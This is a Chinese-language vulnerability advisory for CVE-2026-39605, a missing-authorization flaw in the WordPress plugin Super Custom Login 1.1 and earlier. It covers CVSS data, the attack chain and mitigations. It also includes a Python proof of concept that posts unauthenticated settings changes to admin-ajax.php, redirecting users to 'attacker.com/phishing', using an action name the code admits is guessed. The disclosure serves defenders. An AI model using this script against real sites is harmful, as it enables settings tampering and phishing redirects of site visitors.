CVE-2026-39605 CVSS 5.3 中危

CVE-2026-39605 Super Custom Login授权缺失漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39605

漏洞类型

访问控制失效

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Super Custom Login

漏洞概述

该漏洞源于Obadiah开发的Super Custom Login插件在1.1及之前版本中存在授权缺失问题。攻击者无需用户交互或认证，即可利用错误配置的访问控制安全级别，对受影响系统的完整性造成低程度影响，可能导致恶意设置修改。

技术细节

该漏洞的核心原因在于Super Custom Login插件未在关键的回调函数或管理接口中实施必要的权限验证机制。在WordPress架构中，插件通常通过admin_init钩子或AJAX处理程序来处理敏感操作，但开发者遗漏了current_user_can等检查。攻击者可以通过构造特定的HTTP POST请求，直接调用插件内部处理函数（如更改登录页面样式、重定向URL等），而无需具备管理员权限。由于CVSS向量显示无需用户交互（UI:N）且攻击复杂度低（AC:L），攻击者可轻易批量扫描利用。虽然当前CVSS评分主要反映了完整性影响（I:L），即攻击者可篡改插件配置，但在某些配置下，这可能导致钓鱼页面注入或合法用户被重定向至恶意站点，从而间接造成更严重的安全后果。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描互联网，识别使用Super Custom Login插件且版本低于或等于1.1的WordPress站点。

STEP 2

2. 发起攻击

攻击者向受影响站点的特定管理接口（如admin-ajax.php）发送特制的POST请求，试图修改插件配置。

STEP 3

3. 达成影响

由于缺乏权限验证，服务器接受请求并更新设置，导致插件完整性受损（如重定向地址被篡改）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_missing_auth(target_url):
    """
    PoC for CVE-2026-39605: Missing Authorization in Super Custom Login <= 1.1
    This script attempts to update plugin settings without authentication.
    """
    # The vulnerable endpoint is often an AJAX action or a direct admin-post hook
    # Assuming the vulnerable action is 'update_super_custom_settings'
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    payload = {
        'action': 'update_super_custom_settings',
        'redirect_url': 'http://attacker.com/phishing',
        'custom_css': 'body { display: none; }'
    }

    try:
        response = requests.post(endpoint, data=payload)
        if response.status_code == 200:
            print("[+] Potential exploitation successful. Check settings.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://example-wordpress-site.com"
    exploit_missing_auth(target)

影响范围

Super Custom Login <= 1.1

防御指南

临时缓解措施

建议暂时禁用Super Custom Login插件直到官方修复补丁发布并应用。如果必须使用，可通过Web服务器配置（如Apache的.htaccess或Nginx规则）限制对/wp-admin/和/wp-admin/admin-ajax.php的访问，仅允许可信的管理员IP地址访问，以阻断未授权的配置修改请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表